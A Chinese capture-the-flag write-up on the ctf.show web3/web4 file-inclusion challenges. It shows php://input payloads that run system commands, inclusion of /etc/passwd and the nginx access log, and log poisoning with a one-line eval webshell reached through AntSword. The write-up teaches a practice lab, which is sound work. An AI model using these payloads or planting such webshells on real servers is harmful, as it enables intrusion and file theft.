php伪协议使用示例

1、进入ctf.show靶场的WEB分类下的web3、web4题

  打开的靶场内容显示如下图所示,是文件包含类型,需要上传一个文件,参数名称是 url

 

 2、打开靶场,使用kakit抓包后,利用php伪协议,上传一个php输入流

?url=php://input

<?php system('ls ./');?>

注意:此为执行“查看当前目录”命令。

 ?url=php://input

<?php system('cat ./ctf_go_go_go');?>

 注意:此为执行“查看当前目录下ctf_go_go_go文件内容”命令。

 如上图所示,获取本题flag。

3、利用php伪协议,上传一个服务本地文件

?url=/etc/passwd

注意:此为包含一个服务器本地/etc/passwd文件

 ?url=/var/log/nginx/access.log

注意:此为包含一个服务器本地/var/log/nginx/access.log文件

如上图所示,可以看到nginx的access.log中记录了浏览器版本信息,使用yakit抓包后,浏览器版本信息后面可以追加上一句话木马<?php @eval($_POST['test']);?>,然后放行后。

 使用“中国蚁剑”链接。注意这里的链接密码test是一句话目录需要传的参数名称(即需要执行的系统命令,将以该参数名提交到服务器)。

 如上图所示,点击“保存”后,双击该链接,可以直接链接到服务器,浏览服务器目录,发现当前页面的上级目录下有个flag.txt。

 双击flag.txt,即可查找到flag。

  另外网页上访问,可以发现flag。

 

  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值